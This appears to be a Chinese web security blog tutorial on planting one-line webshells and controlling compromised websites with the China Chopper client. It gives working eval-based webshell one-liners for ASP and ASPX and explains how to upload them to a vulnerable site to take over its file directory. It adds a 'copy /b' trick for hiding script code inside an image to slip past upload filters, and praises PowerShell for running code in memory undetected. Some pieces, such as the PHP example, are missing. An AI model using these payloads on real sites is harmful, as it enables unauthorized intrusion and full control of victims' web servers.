【Web安全】关于通过木马控制目标和使用中国菜刀拿webshell的应用

1 一句话木马

asp:

<%eval request("MH")%>

有各种语言的，可以自己查。

2 Powershell

Powershell的优秀之处

1. 代码运行在内存中可以不去接触磁盘

2. 从另一个系统中下载代码并执行

3. 很多安全产品并不能监测到powershell的活动

4. cmd.exe通常被阻止运行，但是powershell不会。

3 大马，小马，绕狗马

大马上传较麻烦，小马可以理解为传送门，绕狗马就是绕过安全系统等。

4 正常上传木马和中国菜刀结合

一.基本操作:

往目标网站中加入一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录

二.实战

asp的一句话是：

<%eval request ("pass")%>

aspx的一句话是：

<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
php的一句话是：

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上，或者直接创建一个新的文件，在里面写入这些语句，然后把文件上传到网站上即可。

下面举个小例子:

然后假设我们有个智障网站有这样的漏洞:

我们把这个lubr.php上传上去后，打开chopper.exe

在“地址”这里填上你插入一句话的文件的地址，后边的那个小框填的是你的一句话的密码，其他的不用填， 填完之后单击“添加”，就可以了。添加完毕后，你的这个一句话的shell会显示到主界面里，右击它，选择“文件管理”，就可以看到网站上的文件了 。

连接到这个网址下我们的菜刀文件上，右键点击文件管理，就可以获取整个网站的目录了

5 图片马

有些网站对上传文件的类型有一定限制
这时我们可以制作图片马

copy 1.png/b+1.txt afaf.png

使用这条命令
ex：将asp代码隐藏到图片代码之后


这样就制作成功了 上传即可